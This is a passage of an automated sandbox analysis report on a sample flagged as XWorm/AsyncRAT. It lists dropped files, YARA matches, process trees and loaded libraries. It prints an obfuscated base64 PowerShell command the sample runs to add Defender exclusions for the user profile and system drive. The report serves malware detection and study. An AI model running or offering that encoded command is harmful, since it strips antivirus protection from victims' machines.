              Source: Music.UI.exe, 00000004.00000002.3634791820.000002CCD9282000.00000004.00000020.00020000.00000000.sdmp, Music.UI.exe, 00000004.00000002.3634553495.000002CCD91C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
              Source: Music.UI.exe, 00000004.00000002.3634791820.000002CCD9282000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
              Source: Music.UI.exe, 00000004.00000002.3638925659.000002CCD953C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local
              Source: Music.UI.exe, 00000004.00000002.3638925659.000002CCD953C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local/
              Source: Music.UI.exe, 00000004.00000002.3634239371.000002CCD90F8000.00000004.00000020.00020000.00000000.sdmp, Music.UI.exe, 00000004.00000002.3638925659.000002CCD953C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net
              Source: Music.UI.exe, 00000004.00000002.3634239371.000002CCD90F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/
              Source: Music.UI.exe, 00000004.00000002.3633566909.000002CCD8CDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://musicart.xboxlive.com/9/5c6a4700-0000-0000-0000-000000000002/504/image.jpg
              Source: Music.UI.exe, 00000004.00000002.3633566909.000002CCD8CDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://musicart.xboxlive.com/9/e74d4600-0000-0000-0000-000000000002/504/image.jpg
              Source: Music.UI.exe, 00000004.00000003.1477016183.000002CCD8C81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://musicimage.xboxlive.comtXBLWinClient/v10_music/configuration.xml
              Source: powershell.exe, 00000001.00000002.1281166707.000000000609D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: svchost.exe, 00000007.00000003.1209310248.000002CC6B342000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
              Source: edb.log.7.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
              Source: Music.UI.exe, 00000004.00000003.1477016183.000002CCD8C81000.00000004.00000020.00020000.00000000.sdmp, Music.UI.exe, 00000004.00000002.3633444451.000002CCD8C83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://settings-ssl.xboxlive.com/
              Source: Music.UI.exe, 00000004.00000002.3633828425.000002CCD8DE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://settings-ssl.xboxlive.com/XBLWinClient/v10_music/configuration.xml
              Source: Music.UI.exe, 00000004.00000003.1477016183.000002CCD8C81000.00000004.00000020.00020000.00000000.sdmp, Music.UI.exe, 00000004.00000002.3633444451.000002CCD8C83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://settings-ssl.xboxlive.comPN
              Source: Music.UI.exe, 00000004.00000002.3634239371.000002CCD90F8000.00000004.00000020.00020000.00000000.sdmp, Music.UI.exe, 00000004.00000002.3638925659.000002CCD953C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com
              Source: Music.UI.exe, 00000004.00000002.3634239371.000002CCD90F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com/0
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownHTTPS traffic detected: 92.123.20.9:443 -> 192.168.2.4:49710 version: TLS 1.2

              Operating System Destruction

              barindex
              Protects its processes via BreakOnTermination flag
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: 01 00 00 00 Jump to behavior

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 3.0.XClient.exe.190000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
              Source: 3.0.XClient.exe.190000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000003.00000000.1156694138.0000000000192000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Users\user\AppData\Local\Temp\test, type: DROPPEDMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
              Source: C:\Users\user\AppData\Local\Temp\test, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPEDMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04E3B5701_2_04E3B570
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeCode function: 3_2_00007FFC3DD988F23_2_00007FFC3DD988F2
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeCode function: 3_2_00007FFC3DD97B463_2_00007FFC3DD97B46
              Source: test2.exe.bin.exe, 00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs test2.exe.bin.exe
              Source: test2.exe.bin.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
              Source: 3.0.XClient.exe.190000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
              Source: 3.0.XClient.exe.190000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000003.00000000.1156694138.0000000000192000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: C:\Users\user\AppData\Local\Temp\test, type: DROPPEDMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
              Source: C:\Users\user\AppData\Local\Temp\test, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPEDMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: XClient.exe.0.dr, cWbnhgR87wIUBxR6cj09ZIB9qg4ITwrjmhzPldn3d2CFxlXGOKk6uFEWsevbTUJTkeJcPvRm.csCryptographic APIs: 'TransformFinalBlock'
              Source: XClient.exe.0.dr, cWbnhgR87wIUBxR6cj09ZIB9qg4ITwrjmhzPldn3d2CFxlXGOKk6uFEWsevbTUJTkeJcPvRm.csCryptographic APIs: 'TransformFinalBlock'
              Source: XClient.exe.0.dr, xuigMhegpDWb7LyFrukanLGTDbKK1mTJMDADPB9Vz5qijEgBZbzo72QwF7mNBkuarMQ9LipLOQXs5xBkPhs96tO.csCryptographic APIs: 'TransformFinalBlock'
              Source: test.3.dr, cWbnhgR87wIUBxR6cj09ZIB9qg4ITwrjmhzPldn3d2CFxlXGOKk6uFEWsevbTUJTkeJcPvRm.csCryptographic APIs: 'TransformFinalBlock'
              Source: test.3.dr, cWbnhgR87wIUBxR6cj09ZIB9qg4ITwrjmhzPldn3d2CFxlXGOKk6uFEWsevbTUJTkeJcPvRm.csCryptographic APIs: 'TransformFinalBlock'
              Source: test.3.dr, xuigMhegpDWb7LyFrukanLGTDbKK1mTJMDADPB9Vz5qijEgBZbzo72QwF7mNBkuarMQ9LipLOQXs5xBkPhs96tO.csCryptographic APIs: 'TransformFinalBlock'
              Source: XClient.exe.0.dr, gEI2RJZt7QvOAzrcBB7lnj6964hB0MzCMqosR.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: XClient.exe.0.dr, gEI2RJZt7QvOAzrcBB7lnj6964hB0MzCMqosR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: test.3.dr, gEI2RJZt7QvOAzrcBB7lnj6964hB0MzCMqosR.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: test.3.dr, gEI2RJZt7QvOAzrcBB7lnj6964hB0MzCMqosR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.evad.winEXE@11/27@2/3
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeMutant created: NULL
              Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9092:120:WilError_03
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeMutant created: \Sessions\1\BaseNamedObjects\cPb595uDpWLZU8ML
              Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8988:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
              Source: C:\Users\user\Desktop\test2.exe.bin.exeFile created: C:\Users\user\AppData\Local\Temp\XClient.exeJump to behavior
              Source: test2.exe.bin.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\test2.exe.bin.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: test2.exe.bin.exeVirustotal: Detection: 69%
              Source: test2.exe.bin.exeReversingLabs: Detection: 80%
              Source: C:\Users\user\Desktop\test2.exe.bin.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_0-120
              Source: unknownProcess created: C:\Users\user\Desktop\test2.exe.bin.exe "C:\Users\user\Desktop\test2.exe.bin.exe"
              Source: C:\Users\user\Desktop\test2.exe.bin.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZgBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwBuACMAPgA="
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\test2.exe.bin.exeProcess created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"
              Source: unknownProcess created: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe "C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe" -ServerName:Microsoft.ZuneMusic.AppX48dcrcgzqqdshm3kf61t0cm5e9pyd6h6.mca
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
              Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
              Source: C:\Users\user\Desktop\test2.exe.bin.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZgBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwBuACMAPgA="Jump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeProcess created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe" Jump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: twinui.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: mrmcorer.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: windows.staterepositorycore.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: bcp47mrm.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: windows.ui.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: windowmanagementapi.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: inputhost.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: sharedui.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: vccorlib140_app.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: msvcp140_app.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: concrt140_app.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: vcruntime140_app.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: vcruntime140_app.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: msvcp140_app.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.ui.xaml.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.staterepositorycore.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.ui.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windowmanagementapi.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: textinputframework.dllJump to behavior
